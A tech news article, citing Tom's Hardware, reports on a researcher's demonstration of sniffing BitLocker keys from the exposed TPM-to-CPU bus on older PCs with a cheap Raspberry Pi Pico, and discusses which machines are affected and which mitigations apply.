Microsoft says its encryption system is particularly difficult to circumvent. However, it is perfectly possible to do it with a tool costing 10 dollars.
TPM chips have received a lot of attention in recent years. And for good reason: Windows 11 requires the presence of one of them to be installed on a system.
But beyond the promise of a shorter lifespan for PCs unable to migrate from Windows 10, this component also makes it quite easy to encrypt the data present on a device’s hard drives. A real advantage which also makes it, as a YouTuber reveals, its greatest weakness.
A Best Of menu or free access to an encrypted hard drive?
When Microsoft presents us with an encryption system that requires very specific hardware and advanced knowledge to be circumvented, we have the right to believe it. However, BitLocker has a major weakness, linked to the design of certain computers. Indeed, to function, it requires a link between the device’s CPU and the TPM chip connected to its motherboard, a communication path which… is not protected.
The YouTuber stacksmashing, a cybersecurity researcher, has just demonstrated it. On some motherboards, easily accessible connectors allow you to read the data transmitted between the two components. Using a few well-placed probes, he was able to retrieve the encryption information needed to read data from the SSD when the computer started up.
The tool used for this operation is none other than a Raspberry Pi Pico, available for sale in France for less than 6 euros, connected to a printed circuit that he was able to order for a few dollars. The latter allows the use of spring-loaded contacts, which are used to connect to easily accessible and relatively prominent connectors on the motherboard. According to stacksmashing, all these components would have cost him 10 dollars.
No need for soldering here, recovery of the encryption key used by BitLocker can be done on the fly, in… 43 seconds on an assembled and working computer.
Millions of out-of-use PCs affected
The Pi Pico’s mission is to read the bits (0 and 1) shared between the TPM chip and the CPU. Once the encryption key is recovered, simply connect the hard drive of the target computer to another PC to read the data. In its example, stacksmashing only needed open-source software on Linux to decrypt all data on the BitLocker-protected computer. If the latter had been configured with a PIN code, this operation would not normally have been possible.
So, is the protection promised by TPM chips and the most used versions of Windows today viable? Yes and no. Our YouTuber used an aging computer here, which separated this critical component from the CPU. Newer devices no longer have this colossal flaw, since everything is now done in the processor. Which means that accessing the encryption key via such an external process would be considerably more complicated and, above all, slower.
There are two lessons to learn from all this. Inside the CPU or not, the TPM chip sends unencrypted data, leaving the door open to possible circumventions, whether tomorrow or in the more distant future. But above all, BitLocker does not fully fulfill its role on millions of aging or discarded PCs, leaving their folders and other files accessible to anyone. A reminder that the end of a hard drive or SSD and the erasure of its data should not be taken lightly.
Source : Tom’s Hardware
15